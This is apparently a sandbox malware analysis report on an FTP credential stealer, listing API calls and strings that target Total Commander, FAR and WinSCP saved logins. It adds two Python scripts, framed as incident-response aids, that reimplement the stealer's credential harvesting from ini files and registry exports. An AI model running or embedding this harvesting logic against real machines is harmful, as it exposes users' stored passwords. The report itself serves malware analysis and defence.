                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Note: this exact sequence (IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, TerminateProcess with status C0000409 = STATUS_STACK_BUFFER_OVERRUN) is the statically linked MSVC CRT's /GS security-cookie failure handler (__report_gsfailure / __raise_securityfailure). On its own it is compiler runtime code, not a debugger check written by the sample's author.
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
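The two GetPrivateProfileStringW listings above (section enumeration with NULL section and key, then per-section host, username and password reads filled into ftp://%s:%s@%s, with the file located through the installdir and ftpininame values under SOFTWARE\Ghisler\Total Commander) describe a read of Total Commander's FTP connection file. The script below is an added example, not code from the report or from the sample: it replays that read on a constructed ini so an incident responder can see which stored profiles this code path exposes and therefore which credentials to rotate. Assumptions, also marked in the code: the connections and default sections are skipped as non-profiles, the format string is filled as user:password@host, the password field is copied as stored because no decoding step appears in the listing, and wcx_ftp.ini is the default file name behind Total Commander's FtpIniName value.

```python
"""Replay of the Total Commander FTP-profile read seen in the API listing.

Added example with constructed input; not code from the report or the sample.
"""
from typing import Dict, List

# Constructed sample in the wcx_ftp.ini layout (wcx_ftp.ini is the assumed
# default behind the FtpIniName value); not taken from the report.
# [connections] lists profile names, [default] holds defaults, and each
# profile is its own section with host= / username= / password=.
SAMPLE_WCX_FTP_INI = """\
[connections]
default=
prod-web=
backup-box=

[default]
host=
username=
password=

[prod-web]
host=ftp.example.test
username=deploy
password=MCBCADCF0E5A
pasvmode=1

[backup-box]
host=10.0.0.5
username=backup
password=

[legacy]
host=
username=svc
"""

URL_FORMAT = "ftp://%s:%s@%s"               # format string from the listing
META_SECTIONS = {"connections", "default"}  # assumed non-profile sections (both strings appear in the listing)

IniData = Dict[str, Dict[str, str]]


def parse_ini(text: str) -> IniData:
    """Minimal profile-file parser: section order preserved, key names lower-cased."""
    sections: IniData = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def get_private_profile_string(ini: IniData, section: str, key: str, default: str = "") -> str:
    """GetPrivateProfileStringW for one key: case-insensitive lookup, default on a miss."""
    for name, values in ini.items():
        if name.lower() == section.lower():
            return values.get(key.lower(), default)
    return default


def enumerate_sections(ini: IniData) -> List[str]:
    """GetPrivateProfileStringW(NULL, NULL, ...) returns every section name."""
    return list(ini)


def harvest_tc_ftp_profiles(ini_text: str) -> List[str]:
    """Return the ftp:// URLs the sample's code path would build from this ini."""
    ini = parse_ini(ini_text)
    urls: List[str] = []
    for section in enumerate_sections(ini):
        if section.lower() in META_SECTIONS:
            continue
        host = get_private_profile_string(ini, section, "host")
        user = get_private_profile_string(ini, section, "username")
        password = get_private_profile_string(ini, section, "password")  # copied as stored (assumption)
        if not host or not user:            # assumption: incomplete profiles are dropped
            continue
        urls.append(URL_FORMAT % (user, password, host))  # user:password@host order is assumed
    return urls


if __name__ == "__main__":
    for url in harvest_tc_ftp_profiles(SAMPLE_WCX_FTP_INI):
        print(url)
```

Run it as a script to print the URLs, or pass the contents of a real wcx_ftp.ini collected from a host to harvest_tc_ftp_profiles; every URL it returns is a host and user the sample would have read, including profiles that store no password.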
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
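The two registry walks above open HKEY_CURRENT_USER (80000001) under SOFTWARE\Far\Plugins\ftp\hosts, SOFTWARE\Far2\Plugins\ftp\hosts and SOFTWARE\martin prikryl\winscp 2\sessions, call RegEnumKeyExW over each subkey and read hostname, user or username, password and (for WinSCP) portnumber into ftp://%s:%s@%s or ftp://%s:%s@%s:%u. The script below is an added example, not code from the report or from the sample: it applies the same walk to a constructed reg export text of those keys so it runs offline, and it generalises the two listings into one table-driven routine. Assumptions, also marked in the code: the order in which the FAR user and username value names are tried, port 21 when WinSCP stores no portnumber, that entries without a host or user are dropped, and that password data is copied as stored (WinSCP keeps it obfuscated and the listing shows no decoding step).

```python
"""Replay of the registry walk over FAR FTP-plugin hosts and WinSCP sessions.

Added example with constructed input; not code from the report or the sample.
"""
from typing import Dict, List, Optional, Tuple, Union

RegValue = Union[str, int]
RegDump = Dict[str, Dict[str, RegValue]]

# Constructed text in 'reg export' layout for the three keys named in the
# listing; not taken from the report. Password data is shown as stored.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions]

[HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions\Default%20Settings]
"PortNumber"=dword:00000016

[HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions\deploy@ftp.example.test]
"HostName"="ftp.example.test"
"PortNumber"=dword:00000015
"UserName"="deploy"
"Password"="A35C4D5E6F70"

[HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions\build-box]
"HostName"="10.0.0.7"
"UserName"="ci"

[HKEY_CURRENT_USER\SOFTWARE\Far2\Plugins\ftp\hosts\mirror]
"HostName"="mirror.example.test"
"User"="anonymous"
"Password"="guest@"

[HKEY_CURRENT_USER\SOFTWARE\Far\Plugins\ftp\hosts\old-server]
"HostName"="192.0.2.10"
"Username"="root"
"Password"="ZZ"
"""

# One row per key the listing opens: (subkey below HKCU, host value name,
# user value names tried in order, password value name, port value name or
# None, format string). The order of the two FAR user value names is assumed.
HarvestTarget = Tuple[str, str, Tuple[str, ...], str, Optional[str], str]
HARVEST_TARGETS: List[HarvestTarget] = [
    (r"SOFTWARE\martin prikryl\winscp 2\sessions", "hostname", ("username",),
     "password", "portnumber", "ftp://%s:%s@%s:%u"),
    (r"SOFTWARE\Far2\Plugins\ftp\hosts", "hostname", ("username", "user"),
     "password", None, "ftp://%s:%s@%s"),
    (r"SOFTWARE\Far\Plugins\ftp\hosts", "hostname", ("username", "user"),
     "password", None, "ftp://%s:%s@%s"),
]

DEFAULT_FTP_PORT = 21   # assumed when a WinSCP session stores no portnumber


def parse_reg_export(text: str) -> RegDump:
    """Parse a .reg export into {key path: {value name (lower-cased): data}}.

    Handles plain string values and dword values, which is what these keys
    use; .reg string escape sequences are not interpreted.
    """
    keys: RegDump = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, data = line.partition("=")
            name = name.strip('"').lower()
            if data.startswith("dword:"):
                keys[current][name] = int(data[len("dword:"):], 16)
            else:
                keys[current][name] = data.strip('"')
    return keys


def enum_subkeys(dump: RegDump, key: str) -> List[str]:
    """RegEnumKeyExW equivalent: the direct children of key, in dump order."""
    prefix = key.lower() + "\\"
    return [k for k in dump if k.lower().startswith(prefix) and "\\" not in k[len(prefix):]]


def harvest_registry_ftp_credentials(reg_text: str) -> List[str]:
    """Return the ftp:// URLs the sample's registry walk would build from this dump."""
    dump = parse_reg_export(reg_text)
    urls: List[str] = []
    for subkey, host_v, user_vs, pass_v, port_v, fmt in HARVEST_TARGETS:
        root = "HKEY_CURRENT_USER\\" + subkey          # RegOpenKeyExW(HKEY_CURRENT_USER, subkey, ...)
        for session in enum_subkeys(dump, root):
            values = dump[session]
            host = str(values.get(host_v, ""))
            user = next((str(values[v]) for v in user_vs if v in values), "")
            password = str(values.get(pass_v, ""))   # copied as stored (assumption)
            if not host or not user:                  # assumption: incomplete entries are dropped
                continue
            if port_v is None:
                urls.append(fmt % (user, password, host))
            else:
                urls.append(fmt % (user, password, host, int(values.get(port_v, DEFAULT_FTP_PORT))))
    return urls


if __name__ == "__main__":
    for url in harvest_registry_ftp_credentials(SAMPLE_REG_EXPORT):
        print(url)
```

To audit a real machine, replace SAMPLE_REG_EXPORT with the output of reg export for each of the three keys; every session the function returns was readable by the sample's code path, including WinSCP sessions with no saved password, whose host and user still leak.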
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
